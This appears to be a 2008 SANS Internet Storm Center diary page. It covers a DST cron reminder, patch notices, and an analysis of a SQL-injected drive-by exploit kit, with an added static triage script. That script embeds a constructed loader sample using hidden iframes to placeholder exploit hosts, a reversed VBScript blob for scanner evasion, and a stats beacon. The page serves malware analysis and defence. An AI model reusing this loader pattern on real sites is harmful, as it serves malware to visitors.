
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2008-03-07



US Daylight Saving Time starts this weekend

Published: 2008-03-07
Last Updated: 2008-03-08 15:41:14 UTC
by Jim Clausing (Version: 2)

Just a reminder that this is the weekend Daylight Saving Time starts in the US, at 02:00 local time on Sunday morning.  This is the time change where you lose an hour.  Hopefully most of you are running your servers on UTC/GMT, but if they run on local time, beware of cron jobs scheduled in the 02:00-03:00 window: depending on the cron implementation they may fire at odd times or not at all, since that hour never happens on the wall clock. :)  By the way, for those who think I should have taken tomorrow's shift as handler on duty so I could have a shorter shift: we run our shifts on UTC, so they are all 24 hours, every day of the year.
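As an added illustration (not part of Jim's diary), here is a small Python script that works out which wall-clock cron slots are hit by the US transition. It hard-codes the US rule in force since 2007 (second Sunday in March, first Sunday in November, both at 02:00 local), so it needs no tz database; the function names and the `minute hour * * *` cron shape it checks are the example's own.

```python
"""Which local-time cron slots are skipped or repeated by the US DST change.
Added example: the US rule since 2007 is hard-coded so this runs offline."""
from datetime import date, datetime, timedelta


def nth_sunday(year, month, n):
    """Date of the n-th Sunday of the given month (n=1 is the first Sunday)."""
    first = date(year, month, 1)
    offset = (6 - first.weekday()) % 7        # weekday(): Monday=0 ... Sunday=6
    return first + timedelta(days=offset + 7 * (n - 1))


def us_dst_start(year):
    """Clocks jump 02:00 -> 03:00 on the second Sunday in March (US, 2007 onwards)."""
    return nth_sunday(year, 3, 2)


def us_dst_end(year):
    """Clocks fall back 02:00 -> 01:00 on the first Sunday in November (US, 2007 onwards)."""
    return nth_sunday(year, 11, 1)


def classify_local_time(dt):
    """'skipped' if this wall-clock time never occurs that day,
    'ambiguous' if it occurs twice, otherwise 'normal'."""
    if dt.date() == us_dst_start(dt.year) and 2 <= dt.hour < 3:
        return "skipped"
    if dt.date() == us_dst_end(dt.year) and 1 <= dt.hour < 2:
        return "ambiguous"
    return "normal"


def cron_slot_risk(year, hour, minute):
    """For a daily `minute hour * * *` entry on a box keeping US local time,
    return {kind: date} for each transition day on which the slot is skipped
    (the hour does not exist; how cron copes is implementation-specific) or
    ambiguous (the hour happens twice, so the job may run twice)."""
    out = {}
    for d in (us_dst_start(year), us_dst_end(year)):
        kind = classify_local_time(datetime(d.year, d.month, d.day, hour, minute))
        if kind != "normal":
            out[kind] = d
    return out


if __name__ == "__main__":
    print("DST starts", us_dst_start(2008), "and ends", us_dst_end(2008))
    for hour, minute in ((1, 15), (2, 30), (4, 0)):
        print("cron %02d:%02d ->" % (hour, minute), cron_slot_risk(2008, hour, minute) or "fine")
```

Running it for 2008 reports the 9 March start and 2 November end that the diary is warning about, flags a 02:30 job as skipped in March and a 01:15 job as ambiguous in November, and leaves a 04:00 job alone.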


Microsoft Black Tuesday Advanced Notification

Published: 2008-03-07
Last Updated: 2008-03-08 00:04:06 UTC
by Jim Clausing (Version: 1)

It is that time of the month again.  Microsoft has announced that it plans to release four critical bulletins next Tuesday.  More info can be found at http://blogs.technet.com/msrc/archive/2008/03/06/march-2008-advance-notification.aspx.


Odds

Published: 2008-03-07
Last Updated: 2008-03-07 15:56:50 UTC
by Mark Hofman (Version: 1)

Some odds and sods

  • A security issue has been reported for Horde webmail (thanks Dariush)
  • A number of you will have noticed that a new version of Java is available
  • My Vista box insisted on applying KB9401510, which "enables Vista to detect software that bypasses software activation and interferes with normal Windows operation"

Vista SP1

I installed SP1 on a Vista box about a week ago and so far things seem to be quite OK.  I must confess I've only seen a few changes on the system.  When the system goes into sleep mode, it actually starts up again without problems (well, usually).  File transfers on the machine itself are slightly faster.  No longer does it spend half the day trying to calculate how much time it will take to transfer a 1MB file.  The other change I can see is on boot-up: it seems to give me the system slightly faster than it used to.  I still get the occasional BSOD, and the networking just dies after suspending the system a few times, but that could be anything on my box.

Mark - Shearwater


Fun with some code

Published: 2008-03-07
Last Updated: 2008-03-07 15:15:52 UTC
by Mark Hofman (Version: 1)

One of the things I love about being a handler, other than the red shirt, is that pretty much every day I learn something new.  Thanks to our readers, and through cooperation with various groups around the planet, we get to see some interesting stuff.

Last week Jeremy sent us a link and a few files to have a closer look at.  The link was being injected (using SQL injection) into a site and, if successful, would have resulted in a world of pain for anyone visiting the compromised site afterwards.  After a quick check it was obvious that nasty things would happen: the final result was a file with a detection rate of 2/32 on VirusTotal, and the other files had similar detection rates.

When looking at malicious things there are a number of ways to go about it.  The code junkies will look at the code and analyse it, follow it through and throw debuggers at the final executable.  Net heads may execute a file (on a VM or sacrificial system) or visit the link and see where the packets take them.  I probably would have done the latter if I had not seriously trashed my playpen a couple of hours previously, so looking at the code was my only option.  Glad I did.

The first script sets a cookie and generates a random number used to select the exploit path to follow, although only two paths are available.  Depending on the result it pulls in an iframe pointing at either an HTML file or a JS file.

Following the HTML stream, the next page also sets a cookie and attempts a number of exploits: MS06-014, MS07-004, MS06-067, MS06-057, a RealPlayer exploit and a Storm Player exploit are the ones found so far.  Each is attempted in turn; if the preceding exploit did not work, the next one is tried.  Once the final exploit has been attempted, a counter is incremented on a stats site.

The JS stream similarly tries a number of vulnerabilities, including MS07-055, telnet, file transfer, file injection and a RealPlayer attack.  A number of VBScripts are used in this stream, stored reversed, possibly to evade scanning tools.  At the end of this stream another counter is incremented on a stats site.

There were a few interesting things in the scripts, such as the setting of the cookies and the multiple attack streams.  Interestingly, the exploits are all relatively old, but obviously still worth the effort.  The files that are eventually downloaded are typical downloaders that grab additional files, but I'm still going through them.  There is still more to find.
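An added illustration, not Mark's code and not the actual scripts he analysed: a small Python triage helper that statically pulls out of a loader page the three things described above, namely the cookie it sets, the iframe and stats-counter URLs in both branches, and string literals that only turn into a `<script>`/VBScript block once reversed. Nothing is executed, which is the situation Mark was in without a sacrificial box. The loader it runs on is constructed here for the example, the hostnames are placeholders, and the marker list and function names are the example's own.

```python
"""Static triage of a drive-by loader page (added example; the loader below is
constructed for illustration and is NOT one of the scripts from the diary)."""
import re
from dataclasses import dataclass, field

# A VBScript block stored backwards, the way the diary describes the kit
# doing it: a scanner looking for "<script" or "CreateObject" sees neither
# until the page reverses the string at run time.
REVERSED_VBS = "<script language=vbscript>Set o = CreateObject(x)</script>"[::-1]

# Constructed loader: cookie, two-way random branch to an HTML or JS iframe,
# a reversed script blob, and a hit on a stats counter.  Hostnames are placeholders.
SAMPLE = '''
document.cookie = "vis=1; path=/";
var r = Math.floor(Math.random() * 2);
if (r == 0) {
  document.write('<iframe src="http://exploit.example.invalid/a.html" width=0 height=0></iframe>');
} else {
  document.write('<iframe src="http://exploit.example.invalid/b.js" width=0 height=0></iframe>');
}
var s = "%s";
document.write(s.split("").reverse().join(""));
new Image().src = "http://stats.example.invalid/count.php?id=1";
''' % REVERSED_VBS

# Tokens that only make sense in HTML/script context.  If one shows up in a
# string literal after reversing it, the literal was stored backwards.
MARKERS = ("<script", "vbscript", "<iframe", "<object", "clsid:",
           "document.write", "createobject", "activexobject")

# Single- or double-quoted JS string literals, honouring backslash escapes.
STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'', re.S)
URL = re.compile(r'https?://[^\s"\'<>]+', re.I)
COOKIE = re.compile(r'document\.cookie\s*=\s*(["\'])(.*?)\1')


@dataclass
class Triage:
    cookies: list = field(default_factory=list)            # values written to document.cookie
    urls: list = field(default_factory=list)               # every URL, in order first seen
    reversed_literals: list = field(default_factory=list)  # de-reversed script blobs


def triage(src: str) -> Triage:
    """Collect cookies, URLs and reversed script literals without executing anything."""
    t = Triage()
    t.cookies = [m.group(2) for m in COOKIE.finditer(src)]
    seen = set()
    for m in STRING_LIT.finditer(src):
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        if not lit:
            continue
        flipped = lit[::-1]
        # Flag a literal only if markers appear after reversing and not before,
        # so ordinary iframe/script strings are not reported as obfuscated.
        if (any(k in flipped.lower() for k in MARKERS)
                and not any(k in lit.lower() for k in MARKERS)):
            t.reversed_literals.append(flipped)
        for text in (lit, flipped):          # URLs may also be stored backwards
            for u in URL.findall(text):
                if u not in seen:
                    seen.add(u)
                    t.urls.append(u)
    return t


if __name__ == "__main__":
    result = triage(SAMPLE)
    print("cookies set:", result.cookies)
    print("URLs:", *result.urls, sep="\n  ")
    print("reversed script blobs:", *result.reversed_literals, sep="\n  ")
```

Against the constructed sample this lists the cookie, both iframe targets plus the stats URL, and the VBScript block in readable order. On a real sample the URL list is what you would hand to whoever is chasing the hosting sites, and the de-reversed blobs are what goes to the scanner that missed them.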

Only a few sites seem to have been compromised with this code so far.  Attempts to shut down the hosting sites have not yet been successful.  I may be able to publish more info at a later date and provide some code samples.

Cheers

Mark
